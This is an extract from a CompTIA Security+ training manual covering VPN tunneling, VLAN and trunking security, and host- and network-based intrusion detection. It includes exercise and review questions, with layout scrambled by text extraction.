1120 CompTIA Security+ Certification


16 Right-click Server-X Choose Disable Routing and
Remote Access To disable Routing and Remote Access.

Click Yes 17 Remove the crossover cable from Server-Y 18 Reconnect the network cable for Server-Y to the classroom network 19 On Server-Y, access the properties of the network interface Select Obtain an IP address
automatically

To confirm the change.

Select Obtain DNS server


address automatically

20 Click OK twice 21 Close all windows

Network security topologies

1121

Topic C: Tunneling
This topic covers the following CompTIA Security+ exam objective:
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies Tunneling

How tunneling works


Explanation A technology that enables a network to securely send its data through an untrusted or shared network infrastructure, tunneling works by encrypting and encapsulating the secured traffic within packets carried by the second network. Virtual private networks are perhaps the best-known example of tunneling technology. Exhibit 11-3 provides an example of a site-to-site (or gateway-to-gateway) tunnel. In this depiction, an organization has two offices and each has an Internet connection. The two offices routinely need to share sensitive data between their LANs. Approaches such as e-mail encryption are usable, but do not provide the convenience or scalability that the organization desires. The ideal solution is a direct secure link between the two LANs that permits the offices to use the same servers.

Exhibit 11-3: Tunneling across a shared infrastructure To solve the problem, a router with Internet Protocol Security (IPSec) encryption capabilities is deployed as a gateway on each LANs Internet connection. The routers are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual connection between the two routers. When a router sees traffic on its LAN that is destined for the other office, it communicates over the Internet to the router on the other side instructing it to build the tunnel. The tunnel is actually an agreement between the two routers on how the data is encrypted. Once the two routers have negotiated a secure encrypted connection, traffic from the originating host is encrypted using the agreed-upon settings and sent to the peer router. The peer router decrypts the data and forwards it to the appropriate host on its LAN. The connection appears to be a tunnel, because the hosts on the two LANs are unaware that their data is being encrypted. The encryption and delivery of the data over the untrusted network happens transparently to the communicating hosts. Because of their low cost (VPN tunnels often use existing Internet connections) and security, tunneling has become common, replacing wide area network (WAN) links such as frame relay connections. Tunneling is an option for most IP connectivity requirements.

1122 CompTIA Security+ Certification


Do it!

C-1:

Reviewing VPN tunneling

Questions and answers


Make sure that students understand that L2TP and PPTP are tunneling protocols and, unless combined with an encryption protocol such as IPSec or MPPE, do not guarantee confidentiality.

1 Which of the following protocols are used to secure a VPN connection?


A

IPSec L2TP MPPE PPTP

B
C

2 For each of the descriptions below, indicate whether the VPN is a remote access or site-to-site topology. Creates a secured connection between a remote client and an access point or the corporate network Establishes a point-to-point connection Requires an ISP to establish the tunnel Uses tunnel mode encryption Decrypts the entire IP packet before forwarding to the destination host
Remote access

Site-to-site Remote access Site-to-site Site-to-site

Network security topologies

1123

Topic D: Virtual Local Area Networks


This topic covers the following CompTIA Security+ exam objective:
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies VLANs (Virtual Local Area Network)

VLANs
Explanation Virtual local area networks (VLANs) are a way of dividing a single physical network switch among multiple network segments or broadcast domains. This ability to configure multiple VLANs on a single switch is a very powerful and useful technology that offers network flexibility, scalability, increased performance, and some security features. VLANs are often coupled with a complimentary technology, called a trunk, which allows switches to share many VLANs over a single physical link. And because VLANs make it easy to segment a network into multiple subnets (which cannot communicate with each other), they increase the need for routers (which enable communications between subnets), and have a number of important security features, such as packet-filtering capabilities. Because of their benefits, VLANs (and by association, trunking) have become extremely widespread. Most enterprise-grade network switches come standard with the ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities, which can be mitigated by following best practices in network design.

How it works
As an example of how VLANs work, well use a Cisco Catalyst 6509 switch belonging to a business with five departments and 220 employees. This type of switch is an enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight of its nine slots. Thats a total of 384 Ethernet ports on a single switch! By configuring several VLANs on the switch, and assigning each port to an appropriate VLAN, the single physical switch is broken up into multiple logical switches. The business in our example can configure a separate VLAN for each department. It doesnt matter to which port a given users computer is connected because the switch can be configured to place the port into any VLAN.

1124 CompTIA Security+ Certification


Exhibit 11-4 illustrates a hypothetical switch configuration in which some ports on line card 2 are configured for VLAN 2 and others are configured for VLAN 1. VLAN 1 includes noncontiguous ports on two different line cards. The configuration is up to the system administrator; any port can be configured for any VLAN, regardless of its physical location on the switch. Each VLAN behaves in many senses like a different switch: hosts on VLAN 1 cannot communicate with hosts on VLAN 2 unless a router is connected to both subnets to forward traffic between them. However, the switchs configuration determines what VLANs exist and to which VLAN each port is assigned. Trunking adds even more power to VLANs by allowing switches to forward data from multiple VLANs over a single physical link. In Exhibit 11-5, you see an example in which switch A provides connectivity to users on the fourth, fifth, and sixth floors of an office building. Switch B provides network connectivity to users on the fourth floor. The switch for each floor is in turn connected by a single Ethernet connection to a central switch, switch E.

Exhibit 11-4: Physical VLAN configuration on Cisco Catalyst 6509 Because the connection between each switch is a trunk, packets from any VLAN can pass across it. (The normal VLAN boundaries apply, however. Hosts on different VLANs cannot communicate with each other over trunks.) This enables hosts connected to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are also connected to VLAN 20. Without trunking, a separate physical connection for each VLAN would have to be established between each switch and switch E. The switchs built-in intelligence watches packets arriving on a trunk port, automatically determines to which VLAN it belongs, and forwards it to the appropriate port. The result is that the network administrator can place any host in the building on any of his or her networks subnets, on the fly, without any physical recabling. Major trunking protocols include IEEE 802.1q and Ciscos proprietary Inter-Switch Link (ISL).

Network security topologies

1125

Exhibit 11-5: Assigning ports to different VLANs

1126 CompTIA Security+ Certification Security features of VLANs


VLANs have a number of security features, many of which are derived from the fact they permit the administrator to divide a single physical device into multiple subnets, which is to say that VLANs allow networks to be segmented, dividing up hosts and their traffic. VLANs can be configured to group together users in the same group or team, regardless of where their computers are physically connected to the network. The users can be spread throughout a building or across a campus network. Any criteria can be used to divide users up, depending on business requirements. For example, accountants working with sensitive financial data might be segmented on a separate VLAN from other users in order to ensure that the accounting information stays confidential. Because they are on different subnets, hosts in the Accounting Department VLAN cannot communicate directly with other hosts, they can only do so with the help of a router. This protects the Accounting Department from many attacks that rely on direct communication between hosts, such as man-in-the-middle, because accountings broadcasts cannot be seen by other departments users. Further, because traffic filtering can be configured on the router connecting VLANs to the corporate network, the network administrator is able to enforce security policies by stopping prohibited communications between department VLANs. Another useful aspect of VLANs pertains to physically inserting attacking devices, such as a sniffer, into the network. If an unauthorized person gains access to the network closet and attempts to connect a sniffer to the network, VLANs could offer some protection. In this situation, the attacker wouldnt know in advance to which VLAN he was connecting (unless he had previous knowledge of the network) because any port could be configured to be in any VLAN. Depending on the attackers objectives (such as sniffing traffic belonging to the Accounting Department), this could foil the attack. Further, adhering to the best practices outlined here increases the difficulty of connecting rogue devices to the network. Protect unused switch ports. Most configurable switches support the ability to turn off ports. Network administrators should be sure to turn off all switch ports that are not in use so that they cannot be used by an attacker to connect an unauthorized device to the network. Administrators can protect their networks from accidentally leaving an unused port on by moving all unused ports to a separate VLAN without any user traffic and without any router connections. That way, if an attacker does find an active port to use, there is no traffic to sniff and no router to permit him to reach other network segments. Use an air gap to separate trusted from untrusted networks. Do not allow the same switch or network of switches to provide connectivity to networks segregated by security devices such as firewalls. A switch that has direct connections to untrusted networks such as the Internet, or semi-trusted networks such as DMZs, should never be used to contain trusted network segments as well. Several attacks can affect the configuration of the switch so that it does not properly segment VLANs.

Vulnerabilities of VLAN trunks


A number of vulnerabilities are associated with VLAN trunks. This is inherent in their function of carrying traffic from multiple subnets across a single physical connection. One could imagine that if it is desirable to prevent hosts in two different departments (say, Accounting and Marketing) from communicating with each other, that there might be issues with mixing their traffic over a trunk.

Network security topologies Trunk auto-negotiation

1127

One way that trunks can be abused stems from the fact that the default behavior of some manufacturers switches is to automatically negotiate a trunk connection if the connecting device initiates it. Hackers can exploit this behavior by compromising a host on the network and then causing that host to negotiate a trunk connection with the switch. Once the trunk connection has been established, the switch forwards traffic for all VLANs across the link, giving the attacker access to potentially the entire network. Recall our example in which the Accounting and Marketing Departments are placed on separate VLANs and are connected with a router that filters traffic between the two. The attacker could use a host in the Marketing Department to create a trunk with the switch. As the switch begins to forward traffic down the illicit trunk link, the attacker can view and possibly modify traffic from Marketing, Accounting, or any other department using the switch. The protection provided by packet filtering on the router has been completely avoided because the trunk traffic does not pass through the router. Prevent illicit trunk connections by disabling auto-negotiation on all ports. Ports that are to carry trunks should be configured as trunks. All other ports should be configured not to be trunks. Trunk VLAN membership and pruning By default, trunk links are permitted to carry traffic from all VLANs on the network. This can lead to performance degradation of switches from carrying large amounts of traffic across trunks. In some cases, this traffic might not even be needed, as would be the case if a switch received traffic for the Accounting VLAN over a trunk but did not have any ports configured for that VLAN. This situation can be relieved by pruning (that is, removing) unneeded VLANs from the trunk. By removing the Accounting VLAN from the trunk, more bandwidth is made available to users connected to the switch. Some switches simplify this process by automatically pruning VLANs from a trunk if there are not any VLAN member ports on the other side of the trunk link. Relying on this default behavior to ensure that sensitive information is not carried to undesired areas of the network can be dangerous, however. For example, take a switch in a companys mechanic shop that is only used for the shop employees and has a trunk connection back to the office network. By default, only traffic destined for the auto shop is forwarded across the trunk, because there are no ports on the shops switch that are configured for other VLANs. However, the Accounting Departments information is still at risk. If an attacker could configure a port on the shops switch to be in the Accounting VLAN, then the Accounting VLAN would no longer be pruned from the trunk, and Accounting traffic would automatically be forwarded across the trunk to the mechanic shop. An attacker could take advantage of a poorly monitored area to physically compromise the network. In order to prevent such attacks, it is recommended that all trunk links be manually configured with the VLANs that are permitted to traverse them. Manual trunk pruning cannot be overridden the same way that automatic pruning is preempted. For more information on VLANs, go to:
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lansw tch.htm.

1128 CompTIA Security+ Certification


Do it!

D-1:

Discussing VLANs and trunking

Questions and answers


1 Major trunking protocols include which of the following? (Choose all that apply.)
A

IEEE 802.1q IEEE 802.3 Ciscos proprietary Inter-Switch Link (ISL) IEEE 802.10

B
C

2 VLANs are often coupled with a complimentary technology, called _________, which allows switches to share many VLANs over a single physical link. A B
C

spanning tree network address translation trunking pruning

3 When referring to VLANs, pruning refers to removing unneeded VLANs from the trunk. True or false?
True

4 VLANs are used throughout networks to segment, or separate, different hosts from each other on the network. True or false?
True

Network security topologies

1129

Unit summary: Network security topologies


Topic A In this topic, you learned that security zones offer another dimension of network security. You learned about how the DMZ, intranet, and extranet fits within this model. You also considered how the security policy should be developed to include these security zones. In this topic, you examined the Network Address Translation (NAT) and Port Address Translation (PAT) technologies and their role in safeguarding the network. You learned how to configure a router with NAT and to filter Internet traffic for IP addresses and ports. In this topic, you learned how tunneling can be used to securely connect networks over public infrastructures. In this topic, you learned that Virtual LANs (VLANs) are used to divide a physical network into multiple network segments. This isolates sensitive traffic, as in the case of Accounting or Human Resources, from the rest of the corporate network. It also reduces the range of access should a hacker infiltrate the network.

Topic B

Topic C Topic D

Review questions
1 Which security zone should contain your Web, FTP, and mail servers? A Intranet
B

DMZ

C Extranet D VPN 2 Which security zone describes a configuration where the internal network of one company is available to another for B2B transactions?
Extranet

3 Which network service(s) allows internal addresses to be hidden from outside networks?
A B

NAT DMZ

C VLAN D VPN 4 PAT allows many hosts to share a single IP address by combining the IP address with a unique ________________.
TCP/UDP port number

1130 CompTIA Security+ Certification


5 Which networking technology enables a host to securely send its data through an untrusted or public network infrastructure? A Pruning
B

Tunneling

C Extranet D Perimeter network 6 Which of the following ports are necessary for allowing DNS traffic?
A

TCP 53

B TCP 80
C

UDP 53

D UDP 80 7 What are the benefits of a VLAN? A It hides the internal IP address from external networks.
B

It segments traffic on the internal network for increased security.

C It provides a secure tunnel from between two extranets. D It filters incoming traffic for selected IP and port addresses. 8 What are vulnerabilities of the VLAN?
A

A compromised host can negotiate a trunk connection with the switch, giving the attacker access to the entire network.

B A hosts broadcasts can be seen by other network segments. C A sniffer can be physically inserted into a specific targeted network segment.
D

Automatic pruning permits an attacker to reconfigure a switchs port to forward traffic to a different segment.

121

Unit 12 Intrusion detection


Unit time: 120 minutes Complete this unit, and youll know how to:
A Explain intrusion detection systems and

identify some of the major characteristics of intrusion detection products.


B Detail the differences between host-based

and network-based intrusion detection.


C Identify active detection and passive

detection features of both host- and network-based IDS products.


D Explain honeypots and how they are

employed to increase network security.


E Outline the proper response to an attack.

122

CompTIA Security+ Certification

Topic A: Intrusion detection systems


Explanation Much like closed-circuit television systems employed in workplaces to monitor and increase security, intrusion detection systems (IDS) are monitoring devices on the network that help security administrators to identify attacks in progress, stop them, and to conduct forensic analysis after the attack is over. Intrusion detection is an important part of a commonly used security strategy known as defense in depth. Defense in depth is a multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture. Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. For many reasons, it is impossible for firewalls to prevent all attacks. Some attacks occur from inside the network, and as such do not need to pass through the firewall to reach their victim hosts. Other attacks can occur from the outside, but use traffic permitted by the firewall. Intrusion detection systems are complimentary to blocking devices because they can monitor the attack after it crosses through the firewall, either as it passes across the wire, or as it is seen by the victim host. Similar to virus scanners, intrusion detection systems compare traffic to signature files that recognize specific known types of attack. These files are usually provided by the hardware or software vendor and are updated on a subscription basis. Additionally, intrusion detection systems can detect anomalies. Any pattern of traffic that deviates from the expected sequence of packets during a session might be suspect and cause a network manager to be notified. By employing this technique, even attacks that are too new to appear in the signature file might be flagged for manual analysis by an administrator who might be able to stop an attack or mitigate its effect. Intrusion detection tools also assist in protecting organizations by expanding the options available to manage the risk from threats and vulnerabilities. Since the modus operandi of intrusion detection systems is to monitor activity, either on the network segment or on the host, they gather useful information that can not only be used to detect an attacker, but also to identify and stop him, support investigations to understand the attackers strategy, and to prevent the strategy from being successful in the future. Intrusion detection systems are a very powerful tool in a security administrators tool kit.

Negatives and positives


One of the most important goals of IDS is that they must correctly identify intrusions and attacks. False positives and false negatives refer to situations in which the intrusion detection systems do not correctly categorize activities as being attacks or as being benign. There are really only two possible decisions for each activity that IDS observe: the activity can be identified as an attack, or just the opposite, it can be identified as benign.

Intrusion detection

123

Because the IDS can be either correct or incorrect in their determination about the type of activity, there are four possibilities to describe the correctness of IDS determinations: True positives Occur when the IDS correctly identifies undesirable traffic. True negatives Occur when the IDS correctly identifies normal traffic. False positives Occur when the IDS incorrectly identifies normal traffic as an attack. False negatives Occur when the IDS incorrectly identifies an attack as normal traffic. False negatives False negatives imply that the IDS failed to detect an attack, a very undesirable situation. False negatives typically occur when the pattern of traffic is not identified in the signature database, such as with a new attack. False negatives can also occur with network-based IDS when the sensor is not able to analyze passing traffic fast enough. For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec worth of traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets when the volume of traffic on the segment surpasses its 40 Mb/sec capability. IDS is not infallible, and false negatives do indeed occur on a regular basis. The problem of false negatives can be dealt with in two ways. First, a combination of network-based and host-based IDS can be used to obtain more even coverage. The combination also helps to gather more data on attacks that can help administrators analyze the attack more effectively. Second, NIDS can be deployed at multiple strategic locations in the network. That way, an attack missed by one NIDS, on the server farms network segment, for example, might be caught by the NIDS just inside the firewall. False positives False positives happen when the IDS mistakenly reports certain benign activity as malicious. Best-case false positives require human intervention to diagnose the event. Worst-case false positives can cause the legitimate traffic to be blocked by a router or firewall. Obviously, false positives are undesirable because they require the time of a security administratoran expensive commodityto analyze and sort out the problem. All IDS products on the market today are subject to false positives. Especially just after deployment, IDS can be expected to produce a relatively high volume of false positives, which are reduced over time using a process called tuning. The tuning process allows the administrator to instruct sensors not to alarm, based on parameters such as signature type, and source or destination IP address. One common example is a network management program that pings devices to ensure that they are functioning. This behavior resembles a reconnaissance technique called a ping sweep, which attackers can use to determine which IP addresses are up and available to attack. It also triggers an alarm from an NIDS. Although ping sweeps can indicate malicious activity, the alarm is a false positive when the ping sweep is conducted by an authorized host, the network management system. To prevent the NIDS sensor from alarming on a false positive, it can be configured not to alarm on ping sweeps from the network management systems IP address. Tuning is an essential step in any IDS deployment.

124
Do it!

CompTIA Security+ Certification

A-1:

Detecting intrusion

Questions and answers


1 What is defense in depth?
This is a multilayered security approach that uses multiple security techniques such as preventative technologies, security monitoring, and attack response.

2 Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. True or false?
True

3 Intrusion detection systems identify attacks by comparing traffic to signature files with known types of attack and detecting anomalies. True or false?
True

4 False negatives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
False. These are false positives.

5 What measures can you take to reduce false negatives?


A

Combine network-based and host-based IDS. Tune the IDS to accept specific signature types or source or destination IP addresses. Deploy NIDS at multiple strategic locations in the network. Reduce the traffic speed.

B
C

Intrusion detection

125

Topic B: Network-based and host-based IDS


This topic covers the following CompTIA Security+ exam objective:
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Network Based Host Based

Types of IDS
Explanation The two types of intrusion detection systems on the market today are host-based and network-based. The essential difference between them is the scope of activity that they monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.

Network-based IDS
NIDS sensors are dedicated network devices or servers that monitor traffic on one or more network segments. The sensors usually have two network connections, one that operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is used to send data such as alerts to a centralized management system. The configuration is shown in Exhibit 12-1.

Exhibit 12-1: NIDS monitoring and management interfaces Because NIDS analyze all passing traffic, they can be used to protect an entire network segmentor the entire organizationdepending on their placement within the network. The primary constraint for NIDS is the occasional inability to keep up with the pace of network traffic.

126

CompTIA Security+ Certification NIDS architecture One of the key questions that arise in deploying NIDS is, where in the network do sensors belong? Because it is not cost-effective or even manageable to deploy sensors on all network segments, careful consideration needs to be given as to where they are deployed. To determine how to deploy IDS, one needs only answer the question: What do I most need to protect? The decision of where to deploy IDS should be driven by the value your organization places on its information assets. This is because NIDS sensors are placed strategically in the network to defend assets that are considered the most valuable where they will offer the most protection. Typical locations for IDS sensors include: Just inside the firewall On the DMZ On any subnets containing mission-critical servers Just inside the firewall is a common location for IDS because it is the bottleneck through which all inbound and outbound traffic must pass. In this location, sensors are able to inspect every packet coming into or out of the organizations network, provided there are no other avenues such as dial-up connections or extranet connections that the attacker can use. The DMZ is another good location for IDS, because the publicly reachable hosts located there are frequently attacked from the Internet. If a good security policy is implemented (which likely disallows connectivity from the Internet directly to the inside network), then the DMZ is the attackers first point of entry into the network. Once a DMZ host has been compromised, the attacker attempts to penetrate the trusted network. IDS in this location can help to identify and stop intruders before they are able to do so. Finally, consider placing the sensor on any subnets containing mission-critical application servers, such as those performing financial, logistical, and human resources functions. By placing the sensor on these segments, the organization can defend its servers from attacks originating from inside the network. NIDS signature types Signature-based IDS look for patterns in packet payloads that indicate a possible attack. When the sensor finds a packet payload that matches the string pattern in its sensor, it identifies the packet as an attack and alerts the administrator. An IDS based on another signature type, port signature, simply watches for connection attempts to a known or frequently attacked port. These could be ports used by Trojan horse programs, or other malware, or they could simply be well-known ports in a packet destined for part of the network where the corresponding service should not exist. For example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined for the DMZ could be marked as suspicious. Finally, IDS based on header signatures watch for dangerous or illogical combinations in packet headers. One well-known example is a packet generated by the attack tool WinNuke. WinNuke creates packets destined for a NetBIOS port, with the Urgent pointer, or Out Of Band pointer set. This packet crashes older Windows systems. A NIDS based on header signatures identifies this type of packet as an attack, because the attack is contained in the packets header and not in the payload.

Intrusion detection

127

Because new vulnerabilities are constantly identified by the security community, signature-based intrusion detection systems must be kept up to date with the latest signatures, much the same way virus definitions in virus scanning software need to be kept current with the latest developments in the security arena. The time between when the new attack first becomes available and when it becomes known to the security community (which then produces a signature for the attack) represents a vulnerability of signature-based IDS, because attackers are free to use the new exploit without fear of detection during that time period. IDS vendors do commonly provide signature update services, and e-mail customers when new signatures become available. To minimize vulnerability, it is critical that IDS be loaded with the latest signatures. Network IDS reactions As has been previously noted, network-based IDS with active monitoring capabilities are able to react when they detect an attack in progress. Typical reaction types include: TCP resets IP session logging Shunning or blocking Most active capabilities are configurable on a per-signature basis, meaning that the sensor can perform IP session logging for some attacks, blocking for others, or simply sound the alarm, depending on the organizations requirements. Note: Extreme care should be used with active sensor capabilities to prevent interference with legitimate traffic. In practice, active capabilities are infrequently implemented because of the risk that they could be used to deny service of legitimate user traffic. When these capabilities are deployed, it is done after the sensors have been carefully tuned and requires ongoing monitoring. TCP resets TCP resets operate by sending a TCP reset packet (which terminates TCP sessions) to the victim host, spoofing the IP addresses of the attacker. Resets are sent from the sensors monitoring or sniffing interface. Although TCP resets can terminate an attack in progress, they cannot stop the initial packet from reaching the victim. In some cases, a single packet is all that is required to crash or compromise the victim host. Further, in order to successfully spoof the identity of the attacking host (remember that the victim does not know that it is under attack and sees the TCP session as being like any other session that should be protected from session hijacking), the sensor must guess the correct TCP session number so that the victim will accept the reset and end the session. IP session logging With IP session logging, the sensor records traffic passing between the attacker and the victim. (Note that these records can be very useful for analyzing the attack and preventing it in the future.) The limitation of logging is that only the trigger and the subsequent packets are logged, so any preceding packets are lost. IP session logging can also impact sensor performance and quickly consume large amounts of disk space.

128

CompTIA Security+ Certification Shunning In shunning (also known as IDS blocking), the sensor connects to the firewall or a packet-filtering router from its management interface and configures filtering rules that block packets from the attacker. Proper authentication needs to be arranged to ensure that the sensor can securely log into the firewall or router. Shunning is usually a temporary measure (the rules are typically left in for a period of minutes or hours) that buy administrators time to respond. Shunning is not typically a permanent countermeasure. It is important to keep in mind that if the attacker has used a spoofed source address in his attack, then the IDS sensor will actually block someone other than the attacker (the legitimate owner of the spoofed IP address). Note: Shunning takes place after a triggering packet has been noted by the sensor. When it reaches the victim host, it can potentially inflict damage before the filtering rule is in place.

Do it!

B-1:

Discussing network-based IDS

Questions and answers


1 Network-based IDS (NIDS) monitor traffic on a host machine. True or false?
False. NIDS monitor traffic on the network.

2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP reset packet to the victim host. True or false?
True

3 With IP session logging, the sensor records traffic passing between the attacker and the victim. True or false?
True

4 The DMZ is a good location for IDS because the publicly reachable hosts located there will be under constant attack from the Internet. True or false?
True

5 In shunning, the sensor connects to the firewall or a packet-filtering router from what interface?
A

Management IDS sensor Desktop Host sensor

B C D

6 A NIDS that watches for connection attempts to a known or frequently attacked port uses _____________ detection.
port signature

Intrusion detection

129

Host-based IDS
Explanation Host-based IDS are used to protect a critical network server containing sensitive information. Host-based IDS agents (the actual HIDS software) only protect the host on which they are installed. Like any application, host-based IDS agents use resources on the host server (disk space, memory, and processor time), which can have some impact on system performance. HIDS can detect intrusions by analyzing the logs of operating systems and applications, resource utilization, and other system activity. Host-based IDS are primarily used to protect only critical servers, because it is not practical or costeffective to install them on all systems. HIDS method of operation Host-based intrusion detection products have a wealth of methods that can be employed to detect and stop intrusions. A list of the more common techniques employed by modern HIDS products includes: Auditing of logs, including system logs, event logs, security logs, and syslog (for Unix hosts). Monitoring of file checksums to identify changes. Elementary network-based signature techniques including port activity. Intercepting and evaluating requests by applications for system resources before they are processed. Monitoring of system processes for suspicious activity. Log files Most HIDS products audit log files by monitoring changes to them. If a log file is changed, the HIDS product checks the new entry to see if it matches any of the HIDS attack signature patterns. If the log entry does match the attack signature, the HIDS alert administrators. Note that because logs reflect past events, file auditing cannot stop the action that sets off the alarm from taking place. File checksums File checksums are similar to log file audits in that they can detect past activity. Hashes are typically created only for critical system files that should change infrequently if at all. If frequently changing files are included in the file audit, the administrator will need to tune the IDS so that it does not generate alerts every time these files are changed. The tuning process can be used by administrators to learn which files they should expect to change and which should remain static. File checksum systems such as Tripwire can also be employed when full-fledged HIDS products are not available or practical for a particular environment. (Tripwire scans file systems and creates hashes of critical system files. The hashes are saved, and the program is periodically rerun to validate that the hash value for each file has not changed.) By employing such a product, administrators can be notified when an intrusion has occurred (because the attacker will almost certainly upload tools or change permissions to make access to the machine easier), and can be certain which files have been tampered with by the intruder. The modified files can be easily identified and refreshed from backups, eliminating the need to completely rebuild the server.

1210 CompTIA Security+ Certification


Network-based techniques Network-based techniques can also be added to host-based intrusion detection software products. In this situation, the IDS product simply monitors the packets entering and departing the hosts NIC for signs of malicious activity. This solution is designed only to protect the host in question, not to act as a full-featured NIDS product that can protect the entire network segment. Rather than sniff all network traffic, the IDS product simply intercepts received packets before they are passed to the hosts operating system. HIDS products that incorporate NIDS functionality rarely have the same sophisticated attack signatures that dedicated NIDS products have. Most often, HIDS products only provide rudimentary network-based protections. Intercepting requests and monitoring the system Perhaps most significantly, modern HIDS products proactively protect the monitored host by intercepting requests to the operating system for system resources before they are processed. This type of HIDS product integrates with the operating system and is able to validate software calls made into the OS and kernel. Validation of the software calls is accomplished by both generic rules about what processes might have access to resources, and by matching calls to system resources with predefined models (signatures) which identify malicious activity. This feature has far-reaching implications for the security of the protected host. By intercepting calls to the OS before they are processed, HIDS can use active monitoring techniques to preempt attacks before they are executed. Because the operating system controls all system resources, this type of NIDS can: Prevent files from being modified, deleted, and in some cases being viewed. Allow access to data files only to a predefined set of processes. Protect system registry settings from modification. Prevent critical system services (such as a Web server) from being stopped, modified, or deleted. Protect settings for users from being modified or deleted, including preventing escalation of the rights. Stop exploitation of application vulnerabilities that might allow remote access to the system or deny access (DoS) to the system. Prevent the protected servers application from making unauthorized changes to the system.

Intrusion detection HIDS software

1211

Host-based IDS are deployed by installing agent software on the system to be protected. There are two main types of host-based intrusion detection software: host wrappers (some of which are thought of as desktop or personal firewalls) and agent-based software. Either approach is much more effective in detecting trusted-insider attacks (so-called anomalous activity) than is network-based ID, and both are relatively effective for detecting attacks from the outside. However, host wrappers do not have the ability to provide the in-depth, active monitoring measures that agent-based HIDS products have. Host wrappers tend to be inexpensive and deployable on all machines in the enterprise, while agent-based applications are more suited for single purpose servers. Examples of host wrappers are Internet Security Systems (formerly Network ICE and then Black ICE Defender ) BlackICE PC Protection and BlackICE Server Protection (www.iss.net). An example of a full-fledged agent HIDS product is McAfees Entercept host-based IDS product (mcafee.com/us/products/mcafee/host_ips/category.htm). These products have evaluation versions that can be downloaded and used on a trial basis. HIDS active monitoring capabilities When an attack is flagged, host-based IDS have a similar menu of options to that of network-based IDS. However, given that the HIDS have access to the hosts operating system, the HIDS have more power to end attacks with more certainty. List of options commonly used by HIDS agents include: Log the event Alert the administrator Terminate the user login Disable the user account Logs of an offending event that trigger a response from an agent are obviously a useful thing for administrators to review in performing a post mortem on an attack. Administrators can be alerted through an IDS management console (an application responsible for receiving alarms from IDS agents), by sending an e-mail, or by sending SNMP traps to a network management system. The ability for host-based intrusion detection systems to stop attacks in progress by forcing the offending account to log off or disabling it altogether is what makes hostbased IDS an effective security tool and one that compliments network-based IDS and firewalls. Those HIDS products with a high degree of OS integration and which can intercept requests for system resources can go a step further by preventing access to memory, processor time, and disk space altogether.

1212 CompTIA Security+ Certification


Advantages of host-based IDS Host-based and network-based IDS products are complimentary solutions that should be deployed together to provide defense in depth for network assets. Network-based solutions generally provide an early warning system for attacks, often identifying attacker reconnaissance activities. Host-based intrusion detection solutions have the ability to actually stop compromises while they are in progress. Some of the benefits of HIDS include: Host-based systems have the ability to verify success or failure of an attack by reviewing extensive HIDS log entries. Network-based IDS products can verify that an attack was attempted, but cannot always provide evidence as to whether or not the attack was successful. Host-based solutions monitor user and system activities such as file access, changes to permissions and user accounts, software installation, and use of networked resources. This provides detailed information that can be used in a forensic analysis of the attack. Host-based solutions have the ability to protect against attacks that are not network based, such as when an attacker attempts to gain direct physical access to the host from the keyboard. Host-based IDS solutions do not rely on any particular network infrastructure, and so are not limited by switched infrastructures, which can make networkbased IDS implementations difficult. Host-based IDS solutions are able to react very quickly to intrusions, by either preventing access to system resources or by identifying a breach immediately after it has occurred. Because host-based IDS agents are installed on the protected server itself, it requires no additional hardware to deploy, and does not require any changes to the network infrastructure.

Intrusion detection Do it!

1213

B-2:

Discussing host-based IDS

Questions and answers


1 What types of activity do host-based IDS (or HIDS) monitor?
HIDS monitor log files, file checksums, port activity, application requests, and system processes for suspicious activity.

2 In protecting applications, the host sensor agent monitors which areas of application activity? (Choose all that apply.) A B C D E
F

Program files Data file Registry settings Services Users All of the above

3 HIDS can stop an attack in progress by forcing the offending account to log off or disabling it altogether. True or false?
True

4 Some benefits of HIDS include: A B C D E


F

Can verify success or failure of an attack by reviewing log entries. Monitor user and system activities. Protect against attacks that are not network based, such as physical attacks. Are not limited by switched infrastructures. React quickly to intrusions. All of the above.

1214 CompTIA Security+ Certification

Topic C: Active and passive detection


This topic covers the following CompTIA Security+ exam objective:
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Network Based Active Detection Passive Detection Host Based Active Detection Passive Detection

Types of intrusion detection systems


Explanation One way that intrusion detection systems can be categorized is based on their ability to take action when they detect suspicious activity. Passive systems log security events, alert administrators when an attack occurs, and record the offending traffic for analysis, but do not take any preventive action to stop the attack. Active systems have all the logging, alerting, and recording features of passive IDS, with the additional ability to take action against the offending traffic. A couple of options are available for an active system. Active IDS that are able to interoperate with routers and firewalls can upload access control lists to them in order to block the offending traffic at the network edge, as shown in Exhibit 12-2.

Exhibit 12-2: NIDS reconfiguration of a router to block attacking packets

Intrusion detection

1215

This feature is often referred to as IDS shunning or blocking. Another option is for the active IDS system to send a TCP reset, using the spoofed IP address of the attacker, to the victim host, causing the attacking session to be killed. The TCP reset is illustrated in Exhibit 12-3. Although active systems might seem far superior because of their ability to block undesirable traffic, those features must be used with extreme care. Because IDS has not matured to a point where false positives are very low, enabling shunning features on IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can use the IDS to create denial-of-service attacks where legitimate users IP addresses or subnets are blocked from entering the network. Active IDS features tend to be used only in networks where the IDS administrator has carefully tuned the sensors behavior to minimize the number of false positive alarms.

Exhibit 12-3: TCP resets used to stop attacking sessions

Anomaly-based and signature-based IDS


